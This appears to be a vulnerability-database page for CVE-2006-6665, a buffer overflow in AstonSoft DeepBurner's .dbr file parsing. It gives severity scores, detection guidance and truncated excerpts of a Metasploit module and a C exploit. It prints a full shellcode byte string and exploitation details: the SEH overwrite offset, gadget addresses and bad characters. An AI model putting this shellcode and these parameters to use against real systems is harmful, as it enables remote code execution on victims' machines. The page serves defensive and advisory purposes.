CVE-2006-6665
published 2006-12-20CVE-2006-6665: Buffer overflow in Astonsoft DeepBurner Pro and Free 1.8.0 and earlier allows user-assisted remote attackers to execute arbitrary code via a long file name tag…
PriorityP432medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
29.37%
97.9th percentile
Buffer overflow in Astonsoft DeepBurner Pro and Free 1.8.0 and earlier allows user-assisted remote attackers to execute arbitrary code via a long file name tag in a dbr file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| astonsoft | deepburner | <= 1.8.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08\x6b\x48\x82\x83\xeb\xfc\xe2\xf4\xf4\x83\x0c\x82\x08\x6b\xc3\xc7\x34\xe0\x34\x87\x70\x6a\xa7\x09\x47\x73\xc3\xdd\x28\x6a\xa3\xcb\x83\x5f\xc3\x83\xe6\x5a\x88\x1b\xa4\xef\x88\xf6\x0f\xaa\x82\x8f\x09\xa9\xa3\x76\x33\x3f\x6c\x86\x7d\x8e\xc3\xdd\x2c\x6a\xa3\xe4\x83\x67\x03\x09\x57\x77\x49\x69\x83\x77\xc3\x83\xe3\xe2\x14\xa6\x0c\xa8\x79\x42\x6c\xe0\x08\xb2\x8d\xab\x30\x8e\x83\x2b\x44\x09\x78\x77\xe5\x09\x60\x63\xa3\x8b\x83\xeb\xf8\x82\x08\x6b\xc3\xea\x34\x34\x79\x74\x68\x3d\xc1\x7a\x8b\xab\x33\xd2\x60\x9b\xc2\x86\x57\x03\xd0\x7c\x82\x65\x1f\x7d\xef\x08\x29\xee\x6b\x45\x2d\xfa\x6d\x6b\x48\x82
- →The SEH overwrite occurs at offset 272 bytes into the path field of a .dbr file; a short jump of 0x40 bytes is used to skip over the SEH record to reach shellcode. ↗
- →The SEH overwrite uses a pop/pop/ret gadget from BASS.dll (DeepBurner 1.8.0) at 0x10017928; detection should flag .dbr files whose path attribute exceeds 272 bytes. ↗
- →The Metasploit module uses a p/p/r gadget from basswma.dll v2.2.0.3 at 0x101021f8; monitor for DeepBurner loading basswma.dll and crashing on SEH chain traversal. ↗
- →Exploit .dbr files embed XML-encoded shellcode in the path attribute of a <file> tag; look for .dbr files with path attributes containing &#x hex-encoded sequences of length > 272 characters. ↗
- →The DBR file extension is registered to DeepBurner, making drive-by browser delivery possible; monitor browser processes spawning DeepBurner with a .dbr argument from a temp/download directory. ↗
- →Known bad characters for shellcode in this exploit are 0x00, 0x3c (<), 0x3e (>), 0x0a, 0x0d, 0x22 ("), 0x2F (/); IDS rules should look for long runs of non-XML-special bytes in the path attribute. ↗
- ·The Metasploit module targets versions 1.9.0.228 and 1.8.0; the payload space is limited to 512 bytes with a stack adjustment of -3500 and NOP generation disabled. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2006-6665 AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)
AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)
---
##
# $Id: deepburner_path.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'AstonSoft DeepBurner (DBR File) Path Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in versions 1.9.0.228,
1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via
Exploit-DB
AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
exploitdb·2006-12-19
CVE-2006-6665 AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow
---
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ __|_ \
\/ \/ \/ \/ 18\12\06 \/ |__| \/ \/
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP [Happy holidays to everybody]
* MxM .mmm
* W"W """
[i] Title: DeepBurner
#include
#include
#include
// Exploit internals, change only if you know what you are doing
#define BUFFSIZE 1000
//
Metasploit
AstonSoft DeepBurner (DBR File) Path Buffer Overflow
metasploit
AstonSoft DeepBurner (DBR File) Path Buffer Overflow
AstonSoft DeepBurner (DBR File) Path Buffer Overflow
This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extension is registered to DeepBurner.
No writeups or analysis indexed.
http://secunia.com/advisories/23367http://www.securityfocus.com/bid/21657http://www.vupen.com/english/advisories/2006/5066https://www.exploit-db.com/exploits/2950http://secunia.com/advisories/23367http://www.securityfocus.com/bid/21657http://www.vupen.com/english/advisories/2006/5066https://www.exploit-db.com/exploits/2950
2006-12-20
Published